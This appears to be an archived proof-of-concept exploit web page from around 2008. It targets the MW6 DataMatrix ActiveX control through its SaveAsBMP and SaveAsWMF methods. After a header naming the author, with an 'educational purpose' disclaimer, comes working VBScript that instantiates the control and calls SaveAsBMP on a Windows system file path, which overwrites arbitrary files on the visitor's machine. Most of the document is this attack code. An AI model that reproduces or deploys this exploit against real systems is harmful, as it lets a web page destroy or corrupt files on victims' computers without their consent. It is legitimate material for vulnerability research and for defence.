45 lines
No EOL
1.1 KiB
HTML
45 lines
No EOL
1.1 KiB
HTML
<!--
|
|
By Dr.Pantagon
|
|
DeltaSecurityCenter
|
|
www.DeltaSecurity.ir
|
|
Description : DataMatrix ActiveX
|
|
ver : 3.0.0.1
|
|
CopyRight : MW6 Technologies, Inc.
|
|
Download Link : http://www.mw6tech.com/datamatrix/try/MW6DataMatrix.zip
|
|
|
|
This was written for educational purpose. Use it at your own risk.
|
|
Author will be not responsible for any damage.
|
|
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
|
|
|
|
This control contains two methods SaveAsBMP(); And SaveAsWMF();
|
|
|
|
Sub SaveAsWMF (
|
|
ByVal FileName As String
|
|
)
|
|
|
|
AND
|
|
|
|
Sub SaveAsWMF (
|
|
ByVal FileName As String
|
|
)
|
|
you can see this problem to all product this company
|
|
-->
|
|
<html>
|
|
Test Exploit page
|
|
<object classid='clsid:DE7DA0B5-7D7B-4CEA-8739-65CF600D511E' id='target' ></object>
|
|
<script language='vbscript'>
|
|
targetFile = "C:\WINDOWS\system32\DataMatrix.dll"
|
|
prototype = "Sub SaveAsBMP ( ByVal FileName As String )"
|
|
memberName = "SaveAsBMP"
|
|
progid = "DATAMATRIXLib.MW6DataMatrix"
|
|
argCount = 1
|
|
|
|
arg1="c:\windows\system_.ini"
|
|
|
|
target.SaveAsBMP arg1
|
|
'target.SaveAsWMF arg1
|
|
|
|
</script>
|
|
|
|
# milw0rm.com [2008-10-29] |